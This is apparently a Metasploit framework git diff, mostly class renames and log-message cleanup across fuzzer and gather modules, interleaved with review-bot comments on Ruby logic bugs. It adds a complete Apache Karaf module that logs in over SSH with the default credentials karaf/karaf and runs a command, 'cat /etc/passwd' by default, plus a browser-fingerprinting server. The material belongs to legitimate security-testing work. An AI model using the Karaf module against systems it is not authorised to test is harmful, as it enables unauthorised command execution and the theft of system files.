@@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient 
@@ -538,7 +538,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}") end # fuzz headers ? - if datastore['FUZZHEADERS'] == true + if datastore['FUZZHEADERS'] print_status("Fuzzing header fields") do_fuzz_headers(thisform,response.headers) end diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb index 7dfe8a5d26..9aa76fb03e 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb index 7f186ec68a..ef23f1f7e5 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb index 922de4aa88..3d7168f45e 100644 --- a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb +++ b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntp' require 'securerandom' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Fuzzer include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index a6b195bf44..d9ab59f73c 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb 
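Review bot: In modules/auxiliary/fuzzers/http/http_form_field.rb the rewritten guard `if datastore['FUZZHEADERS']` is satisfied by any value other than nil or false, so a string such as 'false' would now enable header fuzzing where the old `== true` comparison did not. That is only equivalent if FUZZHEADERS is registered as a boolean option and the datastore returns a real true/false for it; the option registration is outside this hunk, so please confirm it. A short comment on the guard, for example `# FUZZHEADERS is an OptBool; the datastore yields true/false here`, would record the assumption for the next reader. The enclosing method starts and ends outside the hunk.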
+++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb index 5d4486fc5e..2cca415efe 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb index 17ae41ffde..a7779eb25f 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index a47564f63f..43f2f3d00c 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb index 22b0824f1f..fbd70d10d0 100644 --- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb 
@@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb index a8eec1e014..78fabd2f8d 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb index de640033a7..e8e1e0a081 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index 607d774e18..4f8e978363 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb index 23d1f9cb56..6f14b476c8 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer 
diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb index fb5cad0492..ab17f04b9b 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb index fbb1368b86..c08d8075ee 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb index 658ecdee4a..3f3c58f872 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb index 9074760d1c..c65762796b 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/tds/tds_login_username.rb b/modules/auxiliary/fuzzers/tds/tds_login_username.rb index 611c33d0ca..0f8d5520de 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb 
+++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb index 353e0dbbf5..06aa0639ed 100644 --- a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb +++ b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -48,20 +48,20 @@ class Metasploit4 < Msf::Auxiliary def run - print_status("#{peer} - Get a valid session cookie...") + print_status("Get a valid session cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) unless res and res.code == 200 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve a cookie") + print_error("Could not retrieve a cookie") return end @@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } - print_status("#{peer} - Login...") + print_status("Login...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), 
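Review bot: In modules/auxiliary/gather/alienvault_iso27001_sqli.rb the status and error messages in `run` no longer name the target once the `#{peer} - ` prefix is dropped. They still identify the host only if the framework's print helpers add that prefix for HttpClient modules, and nothing in this diff shows that they do. Without it, console output such as 'Authentication failed' or 'Server did not respond in an expected way' cannot be attributed to a host when the module is run against several targets, which weakens the operator's activity record. Please confirm against the `print_status`/`print_error` implementation, and consider a comment above `run` such as `# print_* prepend the peer automatically; do not add "#{peer} - " here`. The same applies to the later hunks of this file and to every hunk of alienvault_newpolicyform_sqli.rb; the body of `run` continues outside these hunks.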
@@ -83,19 +83,19 @@ class Metasploit4 < Msf::Auxiliary }) unless res and res.code == 302 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/') - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve the authenticated cookie") + print_error("Could not retrieve the authenticated cookie") return end @@ -105,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(6) right_marker = Rex::Text.rand_text_alpha(6) - print_status("#{peer} - Exploiting SQLi...") + print_status("Exploiting SQLi...") loop do file = sqli(left_marker, right_marker, i, cookie, filename) diff --git a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb index 353e7ce052..3fc5e20342 100644 --- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb +++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -48,20 +48,20 @@ class Metasploit4 < Msf::Auxiliary def run - print_status("#{peer} - Get a valid session cookie...") + print_status("Get a valid session cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) unless res && res.code == 200 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve a cookie") + print_error("Could not retrieve a cookie") return end 
@@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } - print_status("#{peer} - Login...") + print_status("Login...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), @@ -83,19 +83,19 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.code == 302 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/') - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve the authenticated cookie") + print_error("Could not retrieve the authenticated cookie") return end @@ -106,7 +106,7 @@ class Metasploit4 < Msf::Auxiliary right_marker = Rex::Text.rand_text_alpha(6) sql_true = Rex::Text.rand_text_alpha(6) - print_status("#{peer} - Exploiting SQLi...") + print_status("Exploiting SQLi...") begin ::Timeout.timeout(datastore['SQLI_TIMEOUT']) do @@ -124,9 +124,9 @@ class Metasploit4 < Msf::Auxiliary end rescue ::Timeout::Error if full.blank? - print_error("#{peer} - Timeout while exploiting sqli, nothing recovered") + print_error("Timeout while exploiting sqli, nothing recovered") else - print_error("#{peer} - Timeout while exploiting sqli, #{full.length} bytes recovered") + print_error("Timeout while exploiting sqli, #{full.length} bytes recovered") end return end diff --git a/modules/auxiliary/gather/android_browser_file_theft.rb b/modules/auxiliary/gather/android_browser_file_theft.rb index f0b00f0fe1..aca3bdc41b 100644 --- a/modules/auxiliary/gather/android_browser_file_theft.rb +++ b/modules/auxiliary/gather/android_browser_file_theft.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb index f87821d32b..266575bff8 100644 --- a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb +++ b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_htmlfileprovider.rb b/modules/auxiliary/gather/android_htmlfileprovider.rb index c8edc3c0ed..339a2f01b6 100644 --- a/modules/auxiliary/gather/android_htmlfileprovider.rb +++ b/modules/auxiliary/gather/android_htmlfileprovider.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb index bebf1f081f..3c3bce84f1 100644 --- a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb +++ b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::JSObfu diff --git a/modules/auxiliary/gather/android_stock_browser_uxss.rb b/modules/auxiliary/gather/android_stock_browser_uxss.rb index 887dcea57d..4296dbb238 100644 --- a/modules/auxiliary/gather/android_stock_browser_uxss.rb 
+++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb new file mode 100644 index 0000000000..5120544133 --- /dev/null +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb 
@@ -0,0 +1,136 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 4, 14), 'auxiliary/scanner/ssh/apache_karaf_command_execution') + + def initialize(info={}) + super(update_info(info, + 'Name' => "Apache Karaf Default Credentials Command Execution", + 'Description' => %q{ + This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x. + The 'karaf' user has a known default password, which can be used to login to the + SSH service, and execute operating system commands from remote. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicholas Starke ' + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Apache Karaf', {}], + ], + 'Privileged' => true, + 'DisclosureDate' => "Feb 9 2016", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8101), + OptString.new('USERNAME', [true, 'Username', 'karaf']), + OptString.new('PASSWORD', [true, 'Password', 'karaf']), + OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd']) + ], self.class + ) + + register_advanced_options( + [ + Opt::Proxies, + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def rport + datastore['RPORT'] + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def cmd + datastore['CMD'] + end + + def do_login(user, pass, ip) + opts = { + :auth_methods => ['password'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :disable_agent => true, + :config => false, + :password => pass, + :record_auth_info => true, + 
:proxies => datastore['Proxies'] + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(ip, user, opts) + end + rescue OpenSSL::Cipher::CipherError => e + print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})") + return + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{ip}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{ip}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{ip}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'") + else + print_error "#{ip}:#{rport} - Unknown error" + end + ssh + end + + def run_host(ip) + print_status("#{ip}:#{rport} - Attempt to login...") + ssh = do_login(username, password, ip) + if ssh + output = ssh.exec!("shell:exec #{cmd}\n").to_s + if output + print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}") + store_loot("apache.karaf.command", + "text/plain", + ip, + output) + vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command") + else + print_error "#{ip}:#{rport} - Command failed to execute" + end + end + end +end \ No newline at end of file diff --git a/modules/auxiliary/gather/apache_rave_creds.rb b/modules/auxiliary/gather/apache_rave_creds.rb index eb9574bbff..320bc12a25 100644 --- a/modules/auxiliary/gather/apache_rave_creds.rb +++ b/modules/auxiliary/gather/apache_rave_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
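Review bot: In `run_host`, `ssh.exec!(...).to_s` always yields a String, and every String is truthy in Ruby, so the `else` branch that prints "Command failed to execute" can never run; test the content instead, e.g. `if output && !output.empty?`. The return value of `store_loot` is discarded and the following `vprint_status` prints the loot type rather than the saved path; `path = store_loot(...)` followed by `vprint_status("#{ip}:#{rport} - Loot stored at: #{path}")` would report where the data went. The session returned by `do_login` is never closed, so each scanned host leaves an SSH connection open; wrap the use in `begin ... ensure ssh.close end`. In `do_login`, the `rescue Net::SSH::AuthenticationFailed` arm is the only one without a `return`, so a failed login also falls through to the "Unknown error" message.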
diff --git a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb index af2359c05b..b754e67c55 100644 --- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb +++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/service_manager' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report @@ -172,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary # set. # def use_zlib - unless Rex::Text.zlib_present? || datastore['HTTP::compression'] == false + unless Rex::Text.zlib_present? || !datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb index 98d347f89d..05dd9a693a 100644 --- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb +++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/format/webarchive' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/gather/avtech744_dvr_accounts.rb b/modules/auxiliary/gather/avtech744_dvr_accounts.rb index 4c37acb610..632127d02d 100644 --- a/modules/auxiliary/gather/avtech744_dvr_accounts.rb +++ b/modules/auxiliary/gather/avtech744_dvr_accounts.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
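Review bot: The new guard in `use_zlib`, `!datastore['HTTP::compression']`, is true only for `nil` and `false`, so any string value counts as "compression set". If the option is registered as a string or enum whose disabled value is itself a string (the registration is outside this hunk, so this needs confirming), the module would reach `fail_with` on a host without zlib even when compression is turned off. A comment above the `unless` stating which values mean "off", or an explicit comparison against them, would make the intent checkable. `use_zlib` starts above the hunk.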
diff --git a/modules/auxiliary/gather/browser_info.rb b/modules/auxiliary/gather/browser_info.rb new file mode 100644 index 0000000000..3279767ded --- /dev/null +++ b/modules/auxiliary/gather/browser_info.rb 
@@ -0,0 +1,85 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "HTTP Client Information Gather", + 'Description' => %q{ + This module gathers information about a browser that exploits might be interested in, such + as OS name, browser version, plugins, etc. By default, the module will return a fake 404, + but you can customize this output by changing the Custom404 datastore option, and + redirect to an external web page. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r' ], + 'DisclosureDate' => "Mar 22 2016", + 'Actions' => + [ + [ + 'WebServer', { + 'Description' => 'A web that collects information about the browser.' + }] + ], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + )) + end + + def is_key_wanted?(key) + ![:module, :created_at, :tried, :vuln_test, :address].include?(key) + end + + def is_value_wanted?(value) + !(value.nil? 
|| value =~ /^undefined|false/ || !value) + end + + def ignore_items!(target_info) + target_info.delete_if do |key, value| + !is_key_wanted?(key) || !is_value_wanted?(value) + end + end + + def report_host_info(target_info) + opts = { host: target_info[:address] } + opts.merge!(target_info) + report_host(opts) + end + + def translate_script_meaning(value) + case value + when 'script' + 'Browser allows JavaScript' + when 'headers' + 'Browser does not allow JavaScript' + end + end + + def print_target_info(cli, target_info) + print_status("#{cli.peerhost} - We have found the following interesting information:") + report_host_info(target_info) + ignore_items!(target_info) + target_info.each_pair do |key, value| + if key == :source + value = translate_script_meaning(value) + end + print_status("#{cli.peerhost} - #{key} = #{value}") + end + end + + def on_request_exploit(cli, req, target_info) + print_target_info(cli, target_info) + send_not_found(cli) + end + + def run + exploit + end + +end diff --git a/modules/auxiliary/gather/checkpoint_hostname.rb b/modules/auxiliary/gather/checkpoint_hostname.rb index b185233021..84d4cf9800 100644 --- a/modules/auxiliary/gather/checkpoint_hostname.rb +++ b/modules/auxiliary/gather/checkpoint_hostname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/chromecast_wifi.rb b/modules/auxiliary/gather/chromecast_wifi.rb index 5b0c218f6d..9cb0676df5 100644 --- a/modules/auxiliary/gather/chromecast_wifi.rb +++ b/modules/auxiliary/gather/chromecast_wifi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index ade049c58b..8754bd5bab 100644 
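Review bot: In `is_value_wanted?` the pattern `/^undefined|false/` parses as "`undefined` at a line start, or `false` anywhere", so any value that merely contains "false" is dropped, and `=~` is applied to whatever type the value happens to be rather than to a String. If the intent is to drop the two literal strings, `value.to_s =~ /\A(?:undefined|false)\z/` says so; with the trailing `|| !value` already covering `nil` and `false`, the separate `value.nil?` test is redundant. The fields in `target_info` appear to be reported by the requesting browser, and `print_target_info` passes the whole hash to `report_host_info` before `ignore_items!` filters it, so a short comment marking these values as client-controlled would help whoever next touches the reporting path.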
--- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 8160691034..b04997750e 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/coldfusion_pwd_props.rb b/modules/auxiliary/gather/coldfusion_pwd_props.rb index 0dd09d79aa..ba70df4668 100644 --- a/modules/auxiliary/gather/coldfusion_pwd_props.rb +++ b/modules/auxiliary/gather/coldfusion_pwd_props.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? - print_error("#{peer} - Unable to receive a response") + print_error("Unable to receive a response") return end 
@@ -213,15 +213,15 @@ class Metasploit3 < Msf::Auxiliary if rdspass.empty? and password.empty? # No pass collected, no point to store anything - print_error("#{peer} - No passwords found") + print_error("No passwords found") return end - print_good("#{peer} - rdspassword = #{rdspass}") - print_good("#{peer} - password = #{password}") - print_good("#{peer} - encrypted = #{encrypted}") + print_good("rdspassword = #{rdspass}") + print_good("password = #{password}") + print_good("encrypted = #{encrypted}") p = store_loot('coldfusion.password.properties', 'text/plain', rhost, res.body) - print_good("#{peer} - password.properties stored in '#{p}'") + print_good("password.properties stored in '#{p}'") end end diff --git a/modules/auxiliary/gather/corpwatch_lookup_id.rb b/modules/auxiliary/gather/corpwatch_lookup_id.rb index e6ca939df3..30cf6a6c26 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_id.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_id.rb @@ -6,7 +6,7 @@ require 